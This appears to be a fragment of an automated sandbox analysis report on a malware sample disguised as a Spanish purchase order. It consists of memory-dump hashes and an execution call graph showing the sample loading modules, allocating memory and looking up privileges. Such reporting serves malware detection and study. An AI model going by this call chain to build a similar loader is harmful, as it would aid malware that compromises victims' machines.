                                            • Instruction Fuzzy Hash: 36012231B082045FDB09E77988142AF3FDB9FC9214F5880B9D50A9B392ED348C478BD2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7cd517313b91f47644be8abec1888182e97813cb975c261348f8f4a7136dc32c
                                            • Instruction ID: 3360660100f017f5a041fb0a99cac1c20f6166450583257ace74516aab286c65
                                            • Opcode Fuzzy Hash: 7cd517313b91f47644be8abec1888182e97813cb975c261348f8f4a7136dc32c
                                            • Instruction Fuzzy Hash: 11019E30758644CFE315CB28C855BA97BAABF8A300F1980E6E515CF3B2CA66DC41CB12
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 43f8d9b5c9df6b458a6ad7145ce7b1d5c943ce96c33203fa6863714d014a8b46
                                            • Instruction ID: e458bd02ffd2aca0e814b8f1158394039a747fb93c12c462a085de0f38f9d6c8
                                            • Opcode Fuzzy Hash: 43f8d9b5c9df6b458a6ad7145ce7b1d5c943ce96c33203fa6863714d014a8b46
                                            • Instruction Fuzzy Hash: 65014F343046118FE725AB69D850ABAB3AFBFC4610B18C56DD956CB351DBB2DC42CF90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 33aae9aa11df043f5b833b6742e28b6f293d638f3b9de8505a31303413c9516c
                                            • Instruction ID: b3c421580f186efe8cac5c899f6b64f559be5028240a4cde21976e837982895b
                                            • Opcode Fuzzy Hash: 33aae9aa11df043f5b833b6742e28b6f293d638f3b9de8505a31303413c9516c
                                            • Instruction Fuzzy Hash: 3C0162343042058FEB24A669D810A6BB39FBFC0610714C46DD946CB354DFB2DC428F95
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163740547.0000000002BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BDD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2bdd000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5ddb8bb123d201ff349ae817d21eb21610f40e15453eb920d1e040b3a22c73b2
                                            • Instruction ID: e999fd2d9744e6e9f4daa63861ed5f84b1185642bb3ef20f8b948f57ed990494
                                            • Opcode Fuzzy Hash: 5ddb8bb123d201ff349ae817d21eb21610f40e15453eb920d1e040b3a22c73b2
                                            • Instruction Fuzzy Hash: E5012B72005306DBE7208B65CCC0BA7FF98EF41224F1885DAED494A286D338D881C671
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d17a684555b1399d6e102fe4bb8bcf0c7639af41f45f00548e389be570890652
                                            • Instruction ID: 25edb3f9819996294ffba4a5d0124306355c9ae4f81a6b0d795146e20c22010e
                                            • Opcode Fuzzy Hash: d17a684555b1399d6e102fe4bb8bcf0c7639af41f45f00548e389be570890652
                                            • Instruction Fuzzy Hash: 8D01F471B0010ADFD744DA78E518A9A7BEBDBC9212B048839E70ACB3A5CF34ED438751
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 599470852fd75b27d793406690e0eefcd2cfe2b4ca1785ca5aaacbbcce904059
                                            • Instruction ID: b20c347606271d5d417519bbaca68f8030cfffab81e6aeb9520a5420972ba89c
                                            • Opcode Fuzzy Hash: 599470852fd75b27d793406690e0eefcd2cfe2b4ca1785ca5aaacbbcce904059
                                            • Instruction Fuzzy Hash: 8E01A7307053508FE729DF2CC458A96BBE9BF42300F04456DD88ACB760DA71AC45CF41
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b98822a0cd0075b36f9ad2a91fba30aae2858754a2cf652c3dfbdb95d18f3df0
                                            • Instruction ID: db31333a7bfed4faf6283addc999b94fad936dc8776d2b59702378a8b1ec8466
                                            • Opcode Fuzzy Hash: b98822a0cd0075b36f9ad2a91fba30aae2858754a2cf652c3dfbdb95d18f3df0
                                            • Instruction Fuzzy Hash: 04018F34204201CFD714DB68D544FB5B3AABF85220B68C5AAD949CB765DBB0DC46CF50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3e12235856292bb2d442dfe45abe88779a4ee857c099c322621165de2c8d083
                                            • Instruction ID: 7d03b74d42bd0032378d6c1ad77510e297ec3379f61001cc0179875548b97bc5
                                            • Opcode Fuzzy Hash: a3e12235856292bb2d442dfe45abe88779a4ee857c099c322621165de2c8d083
                                            • Instruction Fuzzy Hash: 9F014B34204601CFD714DB29D844E66B3AEFF85220B68856AD90AC7365DBB1EC428F90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4b0d24773785b357ef51180dfd15cc5220c2d4626bebf08a82d54c082d9e9cd1
                                            • Instruction ID: 1da915e95de344be9c1dfd4d016fdcc8274424663554ba0d9c76dc5caf2375cf
                                            • Opcode Fuzzy Hash: 4b0d24773785b357ef51180dfd15cc5220c2d4626bebf08a82d54c082d9e9cd1
                                            • Instruction Fuzzy Hash: FD01C271B0050ADFD744DA78E508A9A7BEBDBC9252B044839E70ACB7A5DF34ED438750
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 93015c14334022af317a31363f5a3108f243ef9b01885392977dd28f0746226b
                                            • Instruction ID: 55738ead27ee3a7201a43fc79b50f09a4250ee96605c4b367939efa523011434
                                            • Opcode Fuzzy Hash: 93015c14334022af317a31363f5a3108f243ef9b01885392977dd28f0746226b
                                            • Instruction Fuzzy Hash: D001E97080421ADFFB14CF65C4083ED7BB5BF45350F158669E865EA2A0C7B44E45CF91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9c609c7f4a5e5cc751338fc5eb51624bf169fb83b03b3bf5dce06988c105f4ec
                                            • Instruction ID: cf5ad3003e4a3d7b807606aa3354ec31cfd33ec5c2f38c33dffac71e44f4cedd
                                            • Opcode Fuzzy Hash: 9c609c7f4a5e5cc751338fc5eb51624bf169fb83b03b3bf5dce06988c105f4ec
                                            • Instruction Fuzzy Hash: 2EF0847470C0508FC7109B7CA429665BBFE9FC851271400ABE84AC7722DD30CC028BA0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163740547.0000000002BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BDD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2bdd000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 87a81a308289add11ea30770a8fc3cec9c5b39b0c39d55615442d25cd0b7e23e
                                            • Instruction ID: 52c2a8af8f2f18ab456e77538896fc924d9d26f6e78b254ba070124b28f30aed
                                            • Opcode Fuzzy Hash: 87a81a308289add11ea30770a8fc3cec9c5b39b0c39d55615442d25cd0b7e23e
                                            • Instruction Fuzzy Hash: 2AF09676405344DEE7208B1ADCC4BA6FFA8EF41635F18C59AED484F286D3799844CBB1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 17bf1095043f6eb8d2151939af9198824b1f874b134ff15f8687932cc6303d08
                                            • Instruction ID: c768de7712ef9e47ba0232b09a78e8ae2e1902dfdb6d507171390985d1b49d22
                                            • Opcode Fuzzy Hash: 17bf1095043f6eb8d2151939af9198824b1f874b134ff15f8687932cc6303d08
                                            • Instruction Fuzzy Hash: 03F082767041546FD3048B6A9884E7BABE9FBCC2607158179F548C7311D9304C01CB60
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9b519c574dde9b929ae77201a9a1d5fe06a02f84045ff5a3f1c4c0bdd8237b78
                                            • Instruction ID: 267845fe41f343734ca97d1910071d5f4f84a7ec19b479841815f25bfdc62ce6
                                            • Opcode Fuzzy Hash: 9b519c574dde9b929ae77201a9a1d5fe06a02f84045ff5a3f1c4c0bdd8237b78
                                            • Instruction Fuzzy Hash: 37F06D7295010A8FDB50DFA8C8817BDB7E4FB04300F4489B6D458D3241EA79EA05CB80
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 56cb1fb9f014fc09cce4451e4f55baa3d038a632ccdcdb3662c3c831bed55ef0
                                            • Instruction ID: e979e89597eca78b8563a7f5abb58d742db21e978b4382a1a636f8324db7b901
                                            • Opcode Fuzzy Hash: 56cb1fb9f014fc09cce4451e4f55baa3d038a632ccdcdb3662c3c831bed55ef0
                                            • Instruction Fuzzy Hash: E301E87080021ADFFB14CF6AC4083EEBBF5BF49350F108225E865EA2A0D7B44E40CB91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 63a6ef517c4f91d917d67f4d412864ff781b630c9a65207a5deb45848617c41c
                                            • Instruction ID: 5faedcf83582ff61324b7f4b5d02708a3ceb03a040b16024192e616a1e488bd7
                                            • Opcode Fuzzy Hash: 63a6ef517c4f91d917d67f4d412864ff781b630c9a65207a5deb45848617c41c
                                            • Instruction Fuzzy Hash: 53F0EC71B15115CF9B1496BDA41891A77EF9FC8522314507BE90ACB725DD74CC0287B1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9d86be89bdaeb5e57a075a5f39792f2f445c7ca6d933ade0618a29295cbdd095
                                            • Instruction ID: e9f0ae82492bafd3c23de9e14865d4d713101e47a2e403f99c8c7402511f2fe2
                                            • Opcode Fuzzy Hash: 9d86be89bdaeb5e57a075a5f39792f2f445c7ca6d933ade0618a29295cbdd095
                                            • Instruction Fuzzy Hash: F6E03976B042286F93049AAAD884D6BBBEEEBCC660311807AE548C7314D9319C01C6A0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 49d211ed3ff86381a52666f5b89555b62033bd43c44ae5935b498b7826893619
                                            • Instruction ID: f88bb4b7934466c235a6edfe3e63ea4a31ba3a138c28030b3a29e2d753b46a38
                                            • Opcode Fuzzy Hash: 49d211ed3ff86381a52666f5b89555b62033bd43c44ae5935b498b7826893619
                                            • Instruction Fuzzy Hash: B4F03A307057108FE728EA298848A97B7EDBF45615B08846ED84AC7720DAB1EC40CF96
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c9d12eed9e1e36b5c58cb752d4624f4f89b4d9c02e9d754fe0786ab709b69195
                                            • Instruction ID: 4429c03d52c8d84d9715ec41cd5b3f8931bff1838f1b972c65d836d3ec98d3b9
                                            • Opcode Fuzzy Hash: c9d12eed9e1e36b5c58cb752d4624f4f89b4d9c02e9d754fe0786ab709b69195
                                            • Instruction Fuzzy Hash: 61F03AB0D0420ADFDB54DFA9D841BAEBBF8BB08300F0045A9E908E7300D77499018B91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c11a674d385eeefb856fce38e736d2fd6d707160c76f113c5e02e0cefa316651
                                            • Instruction ID: a6066379e856dc6fa3506c8dbab5617bedf74dbc8f608a230d158f78866be531
                                            • Opcode Fuzzy Hash: c11a674d385eeefb856fce38e736d2fd6d707160c76f113c5e02e0cefa316651
                                            • Instruction Fuzzy Hash: 55F096729442964FDB61CB68CC427AC7BA1AB01211F1881F6D864DB692E63D9606C741
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7255c05dfcb76fa54352cbadc494bc5b0c80fa8ac62d88f860cf0de32fed26eb
                                            • Instruction ID: a0cdcef0e1acc60e5ed1846e930de29aa8c1b8fb7654628fab8d6077a74e275a
                                            • Opcode Fuzzy Hash: 7255c05dfcb76fa54352cbadc494bc5b0c80fa8ac62d88f860cf0de32fed26eb
                                            • Instruction Fuzzy Hash: 3AE092B53054588FC700DBB9A404A553BF7FB8D51171084A8F54AC737ADA28DC029B60
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bed39d51640921acfc26320a223e3ad9ca14f30ad8fe71febcb232cf5bc23564
                                            • Instruction ID: a5e34d8dc8c316c3f25ecc766120131f6fe6d967ba9bb15ac5ccd9f9cafd9919
                                            • Opcode Fuzzy Hash: bed39d51640921acfc26320a223e3ad9ca14f30ad8fe71febcb232cf5bc23564
                                            • Instruction Fuzzy Hash: 97E0CD363005045FC310CB69D804D55BBE9EFDD721B05806AF606C7321CA71DC01CB58
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin

Execution Graph

Execution Coverage: 1.3%
Dynamic/Decrypted Code Coverage: 2.7%
Signature Coverage: 5.8%
Total number of Nodes: 554
Total number of Limit Nodes: 69
API calls 99594->99595 99596 4153b7 99595->99596 99597 4153f2 99596->99597 99598 415405 99596->99598 99601 41540a 99596->99601 99600 41bdc0 2 API calls 99597->99600 99599 41bdc0 2 API calls 99598->99599 99599->99601 99602 4153f7 99600->99602 99601->99455 99602->99455 99604 41ad84 99603->99604 99605 41ac30 LdrLoadDll 99603->99605 99708 41ac30 99604->99708 99605->99604 99608 41ac30 LdrLoadDll 99609 41ad96 99608->99609 99610 41ac30 LdrLoadDll 99609->99610 99611 41ad9f 99610->99611 99612 41ac30 LdrLoadDll 99611->99612 99613 41ada8 99612->99613 99614 41ac30 LdrLoadDll 99613->99614 99615 41adb1 99614->99615 99616 41ac30 LdrLoadDll 99615->99616 99617 41adbd 99616->99617 99618 41ac30 LdrLoadDll 99617->99618 99619 41adc6 99618->99619 99620 41ac30 LdrLoadDll 99619->99620 99621 41adcf 99620->99621 99622 41ac30 LdrLoadDll 99621->99622 99623 41add8 99622->99623 99624 41ac30 LdrLoadDll 99623->99624 99625 41ade1 99624->99625 99626 41ac30 LdrLoadDll 99625->99626 99627 41adea 99626->99627 99628 41ac30 LdrLoadDll 99627->99628 99629 41adf6 99628->99629 99630 41ac30 LdrLoadDll 99629->99630 99631 41adff 99630->99631 99632 41ac30 LdrLoadDll 99631->99632 99633 41ae08 99632->99633 99634 41ac30 LdrLoadDll 99633->99634 99635 41ae11 99634->99635 99636 41ac30 LdrLoadDll 99635->99636 99637 41ae1a 99636->99637 99638 41ac30 LdrLoadDll 99637->99638 99639 41ae23 99638->99639 99640 41ac30 LdrLoadDll 99639->99640 99641 41ae2f 99640->99641 99642 41ac30 LdrLoadDll 99641->99642 99643 41ae38 99642->99643 99644 41ac30 LdrLoadDll 99643->99644 99645 41ae41 99644->99645 99646 41ac30 LdrLoadDll 99645->99646 99647 41ae4a 99646->99647 99648 41ac30 LdrLoadDll 99647->99648 99649 41ae53 99648->99649 99650 41ac30 LdrLoadDll 99649->99650 99651 41ae5c 99650->99651 99652 41ac30 LdrLoadDll 99651->99652 99653 41ae68 99652->99653 99654 41ac30 LdrLoadDll 99653->99654 99655 41ae71 99654->99655 99656 41ac30 LdrLoadDll 99655->99656 99657 41ae7a 99656->99657 99658 41ac30 LdrLoadDll 99657->99658 99659 41ae83 99658->99659 
99660 41ac30 LdrLoadDll 99659->99660 99661 41ae8c 99660->99661 99662 41ac30 LdrLoadDll 99661->99662 99663 41ae95 99662->99663 99664 41ac30 LdrLoadDll 99663->99664 99665 41aea1 99664->99665 99666 41ac30 LdrLoadDll 99665->99666 99667 41aeaa 99666->99667 99668 41ac30 LdrLoadDll 99667->99668 99669 41aeb3 99668->99669 99670 41ac30 LdrLoadDll 99669->99670 99671 41aebc 99670->99671 99672 41ac30 LdrLoadDll 99671->99672 99673 41aec5 99672->99673 99674 41ac30 LdrLoadDll 99673->99674 99675 41aece 99674->99675 99676 41ac30 LdrLoadDll 99675->99676 99677 41aeda 99676->99677 99678 41ac30 LdrLoadDll 99677->99678 99679 41aee3 99678->99679 99680 41ac30 LdrLoadDll 99679->99680 99681 41aeec 99680->99681 99681->99459 99683 41af60 LdrLoadDll 99682->99683 99684 419edc 99683->99684 99714 18a2df0 LdrInitializeThunk 99684->99714 99685 419ef3 99685->99379 99687->99456 99689 41af60 LdrLoadDll 99688->99689 99690 41a55c NtAllocateVirtualMemory 99689->99690 99690->99560 99692 41cf40 99691->99692 99693 41cf46 99691->99693 99692->99566 99694 41bf90 2 API calls 99693->99694 99695 41cf6c 99694->99695 99695->99566 99697 41cfd0 99696->99697 99698 41d02d 99697->99698 99699 41bf90 2 API calls 99697->99699 99698->99574 99700 41d00a 99699->99700 99701 41bdc0 2 API calls 99700->99701 99701->99698 99702->99571 99703->99584 99704->99586 99705->99589 99706->99591 99707->99563 99709 41ac4b 99708->99709 99710 414e50 LdrLoadDll 99709->99710 99711 41ac6b 99710->99711 99712 414e50 LdrLoadDll 99711->99712 99713 41ad17 99711->99713 99712->99713 99713->99608 99714->99685 99716 18a2c1f LdrInitializeThunk 99715->99716 99717 18a2c11 99715->99717 99716->99465 99717->99465 99719 41af60 LdrLoadDll 99718->99719 99720 41a68c RtlFreeHeap 99719->99720 99720->99469 99722 407eb0 99721->99722 99723 407eab 99721->99723 99724 41bd40 2 API calls 99722->99724 99723->99387 99727 407ed5 99724->99727 99725 407f38 99725->99387 99726 419ec0 2 API calls 99726->99727 99727->99725 99727->99726 99728 407f3e 99727->99728 99733 41bd40 2 API 
calls 99727->99733 99737 41a5c0 99727->99737 99729 407f64 99728->99729 99731 41a5c0 2 API calls 99728->99731 99729->99387 99732 407f55 99731->99732 99732->99387 99733->99727 99735 41a5c0 2 API calls 99734->99735 99736 40817e 99735->99736 99736->99348 99738 41af60 LdrLoadDll 99737->99738 99739 41a5dc 99738->99739 99742 18a2c70 LdrInitializeThunk 99739->99742 99740 41a5f3 99740->99727 99742->99740 99744 41b5c3 99743->99744 99747 40acf0 99744->99747 99748 40ad14 99747->99748 99749 40ad50 LdrLoadDll 99748->99749 99750 409c4a 99748->99750 99749->99750 99750->99354 99752 40b063 99751->99752 99752->99752 99754 40b0e0 99752->99754 99766 419c90 LdrLoadDll 99752->99766 99754->99361 99756 41af60 LdrLoadDll 99755->99756 99757 40f1bb 99756->99757 99757->99369 99758 41a7d0 99757->99758 99759 41a7ef LookupPrivilegeValueW 99758->99759 99760 41af60 LdrLoadDll 99758->99760 99759->99365 99760->99759 99762 41a27c 99761->99762 99763 41af60 LdrLoadDll 99761->99763 99767 18a2ea0 LdrInitializeThunk 99762->99767 99763->99762 99764 41a29b 99764->99368 99766->99754 99767->99764 99769 40b1f0 99768->99769 99770 40b040 LdrLoadDll 99769->99770 99771 40b204 99770->99771 99771->99303 99773 40ae51 99772->99773 99774 40ae4d 99772->99774 99775 40ae9c 99773->99775 99778 40ae6a 99773->99778 99774->99305 99820 419cd0 LdrLoadDll 99775->99820 99777 40aead 99777->99305 99819 419cd0 LdrLoadDll 99778->99819 99780 40ae8c 99780->99305 99782 40f4a0 3 API calls 99781->99782 99783 4143c6 99781->99783 99782->99783 99783->99307 99821 4087a0 99784->99821 99786 408a9d 99786->99309 99788 4087a0 19 API calls 99789 408a8a 99788->99789 99789->99786 99839 40f710 10 API calls 99789->99839 99792 41af60 LdrLoadDll 99791->99792 99793 41a51c 99792->99793 99958 18a2e80 LdrInitializeThunk 99793->99958 99794 40c322 99796 40f4a0 99794->99796 99797 40f4bd 99796->99797 99959 419fc0 99797->99959 99800 40f505 99800->99313 99801 41a010 2 API calls 99802 40f52e 99801->99802 99802->99313 99804 41a016 99803->99804 99805 41af60 LdrLoadDll 
99804->99805 99806 41a02c 99805->99806 99965 18a2d10 LdrInitializeThunk 99806->99965 99807 40c385 99807->99319 99807->99322 99810 41af60 LdrLoadDll 99809->99810 99811 41a07c 99810->99811 99966 18a2d30 LdrInitializeThunk 99811->99966 99812 40c459 99812->99330 99815 41af60 LdrLoadDll 99814->99815 99816 419e3c 99815->99816 99967 18a2fb0 LdrInitializeThunk 99816->99967 99817 40c4ac 99817->99334 99819->99780 99820->99777 99822 407ea0 4 API calls 99821->99822 99837 4087ba 99822->99837 99823 408a49 99823->99786 99823->99788 99824 408a3f 99825 408160 2 API calls 99824->99825 99825->99823 99828 419f00 2 API calls 99828->99837 99830 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99830->99837 99831 41a490 LdrLoadDll NtClose 99831->99837 99836 419e20 2 API calls 99836->99837 99837->99823 99837->99824 99837->99828 99837->99830 99837->99831 99837->99836 99840 419d10 99837->99840 99843 4085d0 99837->99843 99855 40f5f0 LdrLoadDll NtClose 99837->99855 99856 419d90 LdrLoadDll 99837->99856 99857 419dc0 LdrLoadDll 99837->99857 99858 419e50 LdrLoadDll 99837->99858 99859 4083a0 99837->99859 99875 405f60 LdrLoadDll 99837->99875 99839->99786 99841 419d2c 99840->99841 99842 41af60 LdrLoadDll 99840->99842 99841->99837 99842->99841 99844 4085e6 99843->99844 99846 4085ff 99844->99846 99876 419880 99844->99876 99851 408771 99846->99851 99897 4081a0 99846->99897 99848 4086e5 99849 4083a0 11 API calls 99848->99849 99848->99851 99850 408713 99849->99850 99850->99851 99852 419f00 2 API calls 99850->99852 99851->99837 99853 408748 99852->99853 99853->99851 99854 41a500 2 API calls 99853->99854 99854->99851 99855->99837 99856->99837 99857->99837 99858->99837 99860 4083c9 99859->99860 99937 408310 99860->99937 99863 41a500 2 API calls 99864 4083dc 99863->99864 99864->99863 99865 408467 99864->99865 99867 408462 99864->99867 99945 40f670 99864->99945 99865->99837 99866 41a490 2 API calls 99868 40849a 99866->99868 99867->99866 99868->99865 99869 419d10 LdrLoadDll 
99868->99869 99870 4084ff 99869->99870 99870->99865 99949 419d50 99870->99949 99872 408563 99872->99865 99873 414a50 8 API calls 99872->99873 99874 4085b8 99873->99874 99874->99837 99875->99837 99877 41bf90 2 API calls 99876->99877 99878 419897 99877->99878 99904 409310 99878->99904 99880 4198b2 99881 4198f0 99880->99881 99882 4198d9 99880->99882 99885 41bd40 2 API calls 99881->99885 99883 41bdc0 2 API calls 99882->99883 99884 4198e6 99883->99884 99884->99846 99886 41992a 99885->99886 99887 41bd40 2 API calls 99886->99887 99889 419943 99887->99889 99894 419be4 99889->99894 99910 41bd80 99889->99910 99891 419bd0 99892 41bdc0 2 API calls 99891->99892 99893 419bda 99892->99893 99893->99846 99895 41bdc0 2 API calls 99894->99895 99896 419c39 99895->99896 99896->99846 99898 40829f 99897->99898 99900 4081b5 99897->99900 99898->99848 99899 414a50 8 API calls 99901 408222 99899->99901 99900->99898 99900->99899 99902 41bdc0 2 API calls 99901->99902 99903 408249 99901->99903 99902->99903 99903->99848 99905 409335 99904->99905 99906 40acf0 LdrLoadDll 99905->99906 99907 409368 99906->99907 99909 40938d 99907->99909 99913 40cf20 99907->99913 99909->99880 99911 419bc9 99910->99911 99931 41a580 99910->99931 99911->99891 99911->99894 99914 40cf4c 99913->99914 99915 41a1e0 LdrLoadDll 99914->99915 99916 40cf65 99915->99916 99917 40cf6c 99916->99917 99924 41a220 99916->99924 99917->99909 99921 40cfa7 99922 41a490 2 API calls 99921->99922 99923 40cfca 99922->99923 99923->99909 99925 41af60 LdrLoadDll 99924->99925 99926 41a23c 99925->99926 99930 18a2ca0 LdrInitializeThunk 99926->99930 99927 40cf8f 99927->99917 99929 41a810 LdrLoadDll 99927->99929 99929->99921 99930->99927 99932 41af60 LdrLoadDll 99931->99932 99933 41a59c 99932->99933 99936 18a2f90 LdrInitializeThunk 99933->99936 99934 41a5b7 99934->99911 99936->99934 99938 408328 99937->99938 99939 40acf0 LdrLoadDll 99938->99939 99940 408343 99939->99940 99941 414e50 LdrLoadDll 99940->99941 99942 408353 99941->99942 99943 40835c 
